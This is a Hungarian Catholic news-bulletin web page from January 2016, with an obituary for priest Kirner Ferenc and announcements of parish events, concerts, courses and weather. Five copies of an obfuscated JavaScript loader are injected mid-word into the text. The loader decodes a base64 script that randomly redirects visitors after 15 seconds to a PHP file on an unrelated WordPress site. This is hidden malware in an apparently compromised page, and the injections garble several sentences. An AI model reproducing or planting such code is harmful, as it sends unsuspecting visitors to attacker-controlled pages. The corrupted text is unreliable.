2016. január 13. – Hírek és programajánló

H Í R E K   E S T E

Elhunyt Kirner Ferenc nyugalmazott esperes
A Szatmári Római Katolikus Püspökség megrendülve, de Isten akaratában megnyugodva tudatja, hogy Kirner Ferenc pápai protonotárius, kanonok, ny. ker. esperes, január 12-én, életének 87., papságának 60. évében a végső szentségekkel megerősítve csendesen elhunyt. Földi maradványait a székesegyházban ravatalozták fel, ahol holnap délután egy órakor közös szentmisét mutatnak be érte, majd a hídon túli római katolikus temetőben helyezik örök nyugalomra.
Kirner Ferenc 1929. május 12-én született Kaplonyban. Elemi iskolát szülőfalujában, a gimnázium 7 évét Nagykárolyban, a 8.-at Szatmárnémetiben, teológiai tanulmányait Szinfaluban (clfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andestin), Szatmárnémetiben és Gyulafehérváron végezte. 1956. december 8-án Isten Szolgája Márton Áron püspök szentelte pappá Désen. Papi működését Túrterebesen kezdte segédlelkészként 1957. január 2-án. 1964. szeptembertől plébános Láposbányán, majd 1973. szeptemberétől Túrterebesen. 1990-től az ugocsai kerület esperese is volt. 1998-ban nyugdíjba vonult, kisegített szülőfalujában, majd idővel a Papi Otthon lakója lett. Ezalatt is állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szolgálatot vállalt a Székesegyházban 2011-ig a hétköznapi- és Nagymadarászon 2015-ig a vasárnapi szentmiséken. Adjon az Isten örök nyugodalmat neki!

Egymásra hangolva
Kápolnásfaluban január 15-17. között, valamint Szentegyházasfalván január 22-24. között kurzust tartanak jegyeseknek és fiatal házasoknak. Kérik azokat a keresztény jegyespárokat, akik 2016 folyamán szándékoznak szentségi házasságot kötni, jelezzék szándékukat személyesen a plébániahivatalokban. A kurzus célja az együttjáró, házasságra készülő vagy már házasságot kötött párok kapcsolatának mélyítése. Jelentkezni a 0744-986.752-es telefonszámon lehet

Imatized Sepsiszentgyörgyön a Krisztus-hívők egységéért
A sepsiszentgyörgyi magyar történelmi egyházak lelkészei és papjai szervezésében az idén is sor kerül a keresztények egységéért végzett imádságra. Az imaalkalmak január 15-24 között zajlanak és minden este hat órakor kezdődnek. Az imahét témáját a lettországi keresztények dolgozták ki, mottója „Arra hívattunk, hogy az Úr nagy tetteit hirdessük!” (1 Pt. 2, 9) A részletes program a város minden templomában ki van függesztve, de megtalálhatják a gyulafehérvári érsekség honlapján is.

Mária Iskola lelkinapja
Január 16-án, szombaton a Brassó - bolonyai plébánián lelkinapot tartanak a Mária Iskola Lelki család tagjainak Hajlák Attila-István vezetésével. – tudtuk meg a gyulafehérvári érsekség honlapjáról. A lekinap témája: az irgalmasság Anyja a Szépszeretet Anyja. A Szűzanya és Isten szeretete. A program délelőtt fél tíz órakor kezdődik, majd délután egy órakor szentmisével zárul.

Templom megáldása Köröstarjánban
Január 17-én, vasárnap délelőtt tíz órakor Böcskei László megyéspüspök ünnepélyes szentmise keretében áldja meg a külsőleg felújított templomot Köröstarjánban. Várják a híveket a közös hálaadásra.

Templombúcsú Margittán
Vasárnap, január 17-én, tartják Margittán az Árpád-házi Szent Margitról nevezett templom búcsúünnepét. A déli tizenkét órakor kezdődő szentmise szónoka Dr. Székely Dénes teológiai tanár.

Élet a Lélekben szemináriumok
Január 18-án, Csíkrákoson este hat órakor, Sepsiszentgyörgyön este hét órakor, Gyergyóditróban pedig január 20-án este hat órától kezdődnek Élet a Lélekben szemináriumok. A fő munkát Isten Lelke végzi, de a szemináriumok elvégzéséhez szükséges a kitartás, az őszinteség, a bátorság és a hajlfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andóság a közösségi életre. Mindenkit várnak aki meg akarja tapasztalni a hit elevenségét, a Jézussal való élet örömét és Isten szeretetét. Iratkozni a helyszínen lehet.

Alcsíki kórustalálkozó
Január 30-án Csíkszentléleken tartják a XXI. alcsíki kórustalálkozót. Szombaton a fél tizenegy órakor kezdődő rózsafüzér-ájtatosság után, szentmisét mutatnak be melynek főcelebránsa Tamás József püspök, szónoka pedig Bilibók Géza tusnádfürdői plébános. A szentmisét követően fellép hét alcsíki kórus.

Katolikus Jótékonysági Bál
A nagyvárad-olaszi Barátok temploma Egyháztanácsának szervezésében, idén immár negyedik alkalommal kerül megrendezésre a Katolikus Jótékonysági Bál, január 30-án, este hét órai kezdettel. Belépő-, illetve pártolójegyeket korlátozott számban, a plébánián lehet megvásárolni.

Az időjárásról: Ma estétől elsősorban a hegyekben gyenge havazásra, hózáporra kell készülnünk. Holnap hajnalra egyre több helyen megszűnik a csapadék, majd napközben átmenetileg szárazabb lesz az idő, több-kevesebb napsütéssel.

MRE - Hírszolgálat, 2016. január 13.


H Í R E K   D É L B E N

Egymásra hangolva
Kápolnásfaluban január 15-17. között, valamint Szentegyházasfalván január 22-24. között kurzust  tartanak jegyeseknek és fiatal házasoknak. Kérik azokat a keresztény jegyespárokat, akik 2016 folyamán szándékoznak szentségi házasságot kötni, jelezzék szándékukat személyesen a plébániahivatalokban. A kurzus célja az együttjáró, házasságra készülő vagy már házasságot kötött párok kapcsolatának mélyítése. Jelentkezni a 0744-986.752-es telefonszámon lehet

20 éves a Marosvásárhely - Remeteszegi plébánia
Január 16-án ünneplik a Marosvásárhely - Remeteszegi Szent Antal Plébánia fennállásának huszadik évfordulóját. Ebből az alkalomból szombaton délelőtt tizenegy órakor hálaadó ünnepi szentmisét mutat be Csató Béla csíkszentkirályi plébános. A szentmisét követően képekkel, emlékekkel idézik fel a múltat, régi arcokat és elődöket.

Orgonakoncert, CD és kötetbemutató
Székelyudvarhelyen a Szent Miklós-plébániatemplomban január 16-án, szombaton, az esti hat órás szentmise után Musica Transilvanica címmel orgonakoncertet ad Potyó István karnagy, a kolozsvári Szent Mihály templom orgonistája. A zenei esemény alkalmával a 19. századi erdélyi orgonamuzsika kerül előtérbe Ruzitska György (1789-1869) kolozsvári zeneszerző alkotásai által, ugyanakkor bemutatják a Ruzitska összes orgonaműveit tartalmazó CD-lemezt és kottáskötetet is. A hangverseny, amelyre minden zenekedvelőt várnak, a székelyudvarhelyi Szent Miklós plébánia támogatásával valósul meg, a kiadványok megjelenését a Communitas Alapítvány tette lehetővé.

Ünnepelnek a pálos szerzetesek
Hargitafürdőn a Szent István templomban, január 24-én, vasárnap fél tíz órakor a szentmise keretében I. Remete Szent Pál és Boldog Özséb atyákat ünnepelik, illetve a két évvel ezelőtti kolostor alapításra emlékeznek. A szentmisét bemutatja Darvas Kozma József plébános, pálos konfráter. Várnak mindenkit a közös ünneplésre.

Élet a Lélekben szemináriumok
Január 18-án, Csíkrákoson este hat, Sepsiszentgyörgyön este hét órakor, Gyergyóditróban január 20-án este hat órakor kezdődik az Élet a Lélekben szeminárium. A szemináriumon a fő munkát Isten Lelke végzi, de elvégzéséhez szükséges, a kitartás, az őszinteség, a bátorság és a hajlfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andóság a közösségi életre. Mindenkit várnak aki meg akarja tapasztalni a hit elevenségét, a Jézussal való élet örömét és Isten szeretetét. Iratkozni a helyszínen lehet.

Imatized Sepsiszentgyörgyön a Krisztus-hívők egységéért
A sepsiszentgyörgyi magyar történelmi egyházak lelkészei és papjai szervezésében az idén is sor kerül a keresztények egységéért végzett imádságra. Az imaalkalmak január 15-24 között zajlanak, és minden este hat órakor kezdődnek. Az imahét témáját a lettországi keresztények dolgozták ki, mottója „Arra hívattunk, hogy az Úr nagy tetteit hirdessük!” (1 Pt. 2, 9)  A részletes program a város minden templomában ki van függesztve.

Alcsíki kórustalálkozó
Január 30-án Csíkszentléleken tartják a XXI. alcsíki kórustalálkozót. Szombaton a fél tizenegy órakor kezdődő rózsafüzér-ájtatosság után, szentmisét mutatnak be melynek főcelebránsa Tamás József püspök, szónoka pedig Bilibók Géza tusnádfürdői plébános. A szentmisét követően fellép hat alcsíki kórus.

Az időjárásról: Ma reggel többfelé gyengén fagyhat, az erdélyi medencében pára, köd is kialakulhat, napközben pedig 4-8 fok valószínű. Változóan felhős-napos időre készülhetünk elszórtan vegyes halmazállapotú csapadékkal. Többfelé továbbra is szeles időre számíthatunk. 

MRE - Hírszolgálat, 2016. január 13.


H Í R E K   R E G G E L

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében a mai napon Maroskeresztúron tartják az örökös szentségimádási napot. Várják a híveket, használják ki az alkalmat az elcsendesedésre, a közös imádatra.

Emberkatedrális: kiállítás és könyvbemutató Márton Áronról
Ma délután öt órakor Marosvásárhelyen, a Bernády Házban kiállítás és könyvbemutató teszi lehetővé a 120 évvel ezelőtt született Márton Áron püspök rendkívüli egyéniségének és példás szolgálatának felidézését. 25 képzőművész közel félszáz műve áll össze jelképes, szép tisztelgéssé az Illyés Gyulától kölcsönzött metaforikus címmel ellátott kötetben. A tárlat anyagát és az albumot Nagy Miklós Kund ajánlja a jelenlevők figyelmébe. Verset mond Gál Mihály, fellép a marosszentgyörgyi Szent Cecília együttes.- tudtuk meg a gyulafehérvári egyházmegye honlapjáról.

20 éves a Marosvásárhely - Remeteszegi plébánia
Január 16-án ünneplik a Marosvásárhely - Remeteszegi Szent Antal Plébánia fennállásának huszadik évfordulóját. Ebből az alkalomból szombaton délelőtt tizenegy órakor hálaadó ünnepi szentmisét mutat be Csató Béla csíkszentkirályi plébános. A szentmisét követően képekkel, emlékekkel idézik fel a múltat, régi arcokat és elődöket.

Hajnali énekek Nagyszebenben
A közeledő Magyar Kultúra Napja alkalmából január 15-én, a HÍD Egyesület idei első eseményére kerül sor, este hét órai kezdettel a nagyszebeni Habitus Könyvesboltban: Muszka Sándor és az Evilági együttes bemutatják a Hajnali énekek című előadást. Várnak minden magyar vers- illetve dalkedvelőt.

Orgonakoncert, CD és kötetbemutató
Székelyudvarhelyen a Szent Miklós-plébániatemplomban január 16-án, szombaton, az esti hat órás szentmise után Musica Transilvanica címmel orgonakoncertet ad Potyó István karnagy, a kolozsvári Szent Mihály templom orgonistája. A zenei esemény alkalmával a 19. századi erdélyi orgonamuzsika kerül előtérbe Ruzitska György (1789-1869) kolozsvári zeneszerző alkotásai által, ugyanakkor bemutatják a Ruzitska összes orgonaműveit tartalmazó CD-lemezt és kottáskötetet is. A hangverseny, amelyre minden zenekedvelőt várnak, a székelyudvarhelyi Szent Miklós plébánia támogatásával valósul meg, a kiadványok megjelenését a Communitas Alapítvány tette lehetővé.

Ünnepelnek a pálos szerzetesek
Hargitafürdőn a Szent István templomban, január 24-én, vasárnap fél tíz órakor a szentmise keretében I. Remete Szent Pál és Boldog Özséb atyákat ünnepelik, illetve a két évvel ezelőtti kolostor alapításra emlékeznek. A szentmisét bemutatja Darvas Kozma József plébános, pálos konfráter. Várnak mindenkit a közös ünneplésre.

Élet a Lélekben szemináriumok
Január 18-án, Csíkrákoson este hat, Sepsiszentgyörgyön este hét órakor, Gyergyóditróban január 20-án este hat órakor kezdődik az Élet a Lélekben szeminárium. A szemináriumon a fő munkát Isten Lelke végzi, de elvégzéséhez szükséges, a kitartás, az őszinteség, a bátorság és a hajlfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andóság a közösségi életre. Mindenkit várnak aki meg akarja tapasztalni a hit elevenségét, a Jézussal való élet örömét és Isten szeretetét. Iratkozni a helyszínen lehet.

Téli ifjúsági tábor Gyimesfelsőlokon
A Gyulafehérvári Főegyházmegyei Ifjúsági Főlelkészség és a Keresztirány Ifjúsági Szolgálat február 6-10. között téli tábort szervez a gyimesfelsőloki Árpád házi Szent Erzsébet Gimnázium bentlakásában, 14 és 19 év közötti fiataloknak. A „Boldogok az irgalmasok” mottójú táborban lehetőség lesz a vakációban megtapasztalni Istent és a közösséget. Lesz szentmise, közösség építő programok, sízés, hópánkózás,  sok játék.  Jelentkezni a www.keresztirany.ro honlapon lehet,  a helyek száma korlátozott.

Segítség szenvedélybetegeknek
A Bonus Pastor Alapítvány rövidtávú terápiás programot szervez szenvedélybetegeknek és felnőtt hozzátartozóiknak február1-12. között. Várják azok  jelentkezését, akik változtatni szeretnének alkohol-, drog-, játék- vagy társfüggőségükkel terhelt életmódjukon. Jelentkezési határidő: január 24., délután négy óra. Bővebb információk a www.bonuspastor.ro honlapon találhatóak.

Az időjárásról: Ma reggel többfelé gyengén fagyhat, az erdélyi medencében pára, köd is kialakulhat, napközben pedig 4-8 fok valószínű. Változóan felhős-napos időre készülhetünk elszórtan vegyes halmazállapotú csapadékkal. Többfelé továbbra is szeles időre számíthatunk. 

MRE - Hírszolgálat, 2016. január 13.

About the author

maradmin

Leave a Comment